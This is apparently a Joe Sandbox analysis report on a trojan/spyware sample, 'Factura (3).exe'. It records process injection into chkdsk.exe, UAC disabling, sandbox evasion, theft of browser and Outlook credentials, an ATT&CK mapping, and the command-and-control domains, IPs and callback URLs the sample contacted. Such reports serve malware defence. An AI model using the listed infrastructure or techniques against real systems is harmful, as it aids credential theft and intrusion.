            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340F267C GetSystemTimeAsFileTime,6_2_00007FF7340F267C

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: Amcache.hve.17.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.17.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.17.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.17.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.17.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\chkdsk.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\chkdsk.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match | File source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
ATT&CK matrix, listed per tactic (a number in front of a technique is the report's signature-count badge for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 11 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 512 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 2 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 512 Process Injection; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 System Time Discovery; 261 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 34 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 1442718 | Sample: Factura (3).exe | Startdate: 16/05/2024 | Architecture: WINDOWS | Score: 100

Behavior graph as a process tree (numbers in parentheses after a process name are the graph's count badges, see legend; "injected" marks a process reached by injection rather than by a normal start):

• Start node. Contacts: www.zwervertjes.be; www.walletweb367.top; 17 other IPs or domains. Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures
  • Factura (3).exe (2), started. Signatures: Very long command line found; Encrypted powershell cmdline option found
    • powershell.exe (1, 15), started. Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 3 other signatures
      • csc.exe, started. Signatures: Maps a DLL or memory area into another process
        • KAnMKAQhHABqpRuDRpLtww.exe, injected. Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          • chkdsk.exe (13), started. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
            • KAnMKAQhHABqpRuDRpLtww.exe, injected. Contacts: lenslaser.com 162.241.216.140, ports 49714, 49716, 49717, UNIFIEDLAYER-AS-1US United States; www.walletweb367.top 91.195.240.123, ports 49731, 49732, 49733, SEDO-ASDE Germany; 7 other IPs or domains. Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            • firefox.exe, started
      • powershell.exe (23), started. Signatures: Loading BitLocker PowerShell Module
        • conhost.exe, started
      • WerFault.exe (20, 16), started
      • 2 other processes
    • conhost.exe, started

Source | Detection | Scanner | Label | Link
Factura (3).exe | 34% | ReversingLabs | Win64.Trojan.Swotter | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | -
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware | -
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe | -
https://contoso.com/License | 0% | URL Reputation | safe | -
https://contoso.com/Icon | 0% | URL Reputation | safe | -
http://upx.sf.net | 0% | URL Reputation | safe | -
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | -
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | -
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | -
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | -
https://contoso.com/ | 0% | URL Reputation | safe | -
https://nuget.org/nuget.exe | 0% | URL Reputation | safe | -
http://www.deaybrid.info/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA== | 0% | Avira URL Cloud | safe | -
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe | -
http://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw== | 0% | Avira URL Cloud | safe | -
http://www.zwervertjes.be/mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFK | 0% | Avira URL Cloud | safe | -
http://www.carliente.com/mcz6/ | 0% | Avira URL Cloud | safe | -
https://aka.ms/pscore68 | 0% | URL Reputation | safe | -
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | -
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe | -
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | -
http://www.carliente.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA== | 0% | Avira URL Cloud | safe | -
http://www.walletweb367.top/mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFK | 0% | Avira URL Cloud | safe | -
http://www.lenslaser.com/mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK | 0% | Avira URL Cloud | safe | -
http://www.dty377.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw== | 0% | Avira URL Cloud | safe | -
https://www.fastmail.help/hc/en-us/articles/1500000280141 | 0% | Avira URL Cloud | safe | -
http://www.allinone24.shop/mcz6/ | 0% | Avira URL Cloud | safe | -
http://www.zwervertjes.be | 0% | Avira URL Cloud | safe | -
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe | -
http://www.lenslaser.com/mcz6/ | 0% | Avira URL Cloud | safe | -
https://www.google.com | 0% | Avira URL Cloud | safe | -
http://www.walletweb367.top/mcz6/ | 0% | Avira URL Cloud | safe | -
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe | -
https://www.fastmailusercontent.com/filestorage/css/main.css | 0% | Avira URL Cloud | safe | -
http://www.deaybrid.info/mcz6/ | 0% | Avira URL Cloud | safe | -
https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP2 | 0% | Avira URL Cloud | safe | -
http://www.gledingakademiet.no/mcz6/ | 0% | Avira URL Cloud | safe | -
http://www.zwervertjes.be/mcz6/ | 0% | Avira URL Cloud | safe | -
https://www.strato.de | 0% | Avira URL Cloud | safe | -
http://www.celebration24.co.uk/mcz6/ | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | - | unknown
carliente.com | 217.160.0.111 | true | true | - | unknown
lenslaser.com | 162.241.216.140 | true | true | - | unknown
allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai | 57.151.38.169 | true | true | - | unknown
www.deaybrid.info | 162.0.237.22 | true | true | - | unknown
www.gledingakademiet.no | 104.37.39.71 | true | true | - | unknown
www.celebration24.co.uk | 103.168.172.37 | true | true | - | unknown
www.zwervertjes.be | 199.59.243.225 | true | true | - | unknown
dty377.com | 3.33.130.190 | true | true | - | unknown
www.walletweb367.top | 91.195.240.123 | true | true | - | unknown
www.cookedatthebottom.com | unknown | unknown | true | - | unknown
www.prizesupermarket.com | unknown | unknown | true | - | unknown
www.alfaspa.net | unknown | unknown | true | - | unknown
www.polhi.lol | unknown | unknown | true | - | unknown
www.dty377.com | unknown | unknown | true | - | unknown
www.lenslaser.com | unknown | unknown | true | - | unknown
www.jrksa.info | unknown | unknown | true | - | unknown
www.maerealtysg.com | unknown | unknown | true | - | unknown
www.allinone24.shop | unknown | unknown | true | - | unknown
www.carliente.com | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP29Gns/tznWejtp74GMksy59FodZgvEjUcMF+Pj4nBc1gMpqWDMKZB4BsRbutJiIudg/fevYEHw== | true | Avira URL Cloud: safe | unknown
http://www.deaybrid.info/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA== | true | Avira URL Cloud: safe | unknown
http://www.carliente.com/mcz6/ | true | Avira URL Cloud: safe | unknown
http://www.zwervertjes.be/mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFK | true | Avira URL Cloud: safe | unknown
http://www.lenslaser.com/mcz6/?1Joh=jpQBXhuFRU/tY42PEy1MRCLekuE2gkbQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREibl9IXZIQ7kou/2QQYtq6MxCehvw2Hq6A==&-xl=hBllB6kp4D1dBFK | true | Avira URL Cloud: safe | unknown
http://www.walletweb367.top/mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFK | true | Avira URL Cloud: safe | unknown
http://www.carliente.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=t2ltNu02BWCxFJkDVXGm6lgSI2VyyVBo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33fhcSA/1GWguFcrikpDXwe5bKKbqlQA== | true | Avira URL Cloud: safe | unknown
http://www.dty377.com/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=D5+pF2/O5onkRgswN5mCVTTvHr6l6Q5GMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiEBBB3RCutNlD9KPyQG6aNo0jRjsCiw== | true | Avira URL Cloud: safe | unknown
http://www.allinone24.shop/mcz6/ | true | Avira URL Cloud: safe | unknown
http://www.lenslaser.com/mcz6/ | true | Avira URL Cloud: safe | unknown
http://www.walletweb367.top/mcz6/ | true | Avira URL Cloud: safe | unknown
http://www.deaybrid.info/mcz6/ | true | Avira URL Cloud: safe | unknown
http://www.zwervertjes.be/mcz6/ | true | Avira URL Cloud: safe | unknown
http://www.gledingakademiet.no/mcz6/ | true | Avira URL Cloud: safe | unknown
http://www.celebration24.co.uk/mcz6/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.17.dr | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.1563610198.000001CE11DB9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.fastmail.help/hc/en-us/articles/1500000280141 | chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | chkdsk.exe, 00000017.00000002.3768491954.0000000007F10000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3766720594.000000000722E000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000004AAE000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zwervertjes.be | KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3767966509.00000000056FF000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.1592655805.000001CE21C06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.fastmailusercontent.com/filestorage/css/main.css | chkdsk.exe, 00000017.00000002.3766720594.0000000006D78000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.00000000045F8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.allinone24.shop/mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=iV05GdjlKKe2FocmpbDy7295TkLfoCrmYroAP0qP2 | chkdsk.exe, 00000017.00000002.3766720594.00000000060E8000.00000004.10000000.00040000.00000000.sdmp, KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003968000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.1563610198.000001CE11B91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkdsk.exe, 00000017.00000002.3768673482.0000000009A38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.strato.deKAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3766204817.0000000003C8C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
Contacted IPs (flag column omitted; it is an image with no text)

IP | Domain | Country | ASN | ASN Name | Malicious
103.168.172.37 | www.celebration24.co.uk | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
104.37.39.71 | www.gledingakademiet.no | Denmark | 51468 | ONECOMDK | true
217.160.0.111 | carliente.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
162.0.237.22 | www.deaybrid.info | Canada | 22612 | NAMECHEAP-NETUS | true
162.241.216.140 | lenslaser.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
91.195.240.123 | www.walletweb367.top | Germany | 47846 | SEDO-ASDE | true
3.33.130.190 | dty377.com | United States | 8987 | AMAZONEXPANSIONGB | true
57.151.38.169 | allinonestore-567794-react-native.b567794.prod.eastus.az.svc.builder.ai | Belgium | 2686 | ATGS-MMD-ASUS | true
199.59.243.225 | www.zwervertjes.be | United States | 395082 | BODIS-NJUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1442718
Start date and time: 2024-05-16 17:17:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Factura (3).exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@17/15@15/9
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 87
• Number of non-executed functions: 320
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtSetInformationFile calls found.
• VT rate limit hit for: Factura (3).exe
Time | Type | Description
11:18:10 | API Interceptor | 56x Sleep call for process: powershell.exe modified
11:18:28 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:19:09 | API Interceptor | 9853848x Sleep call for process: chkdsk.exe modified
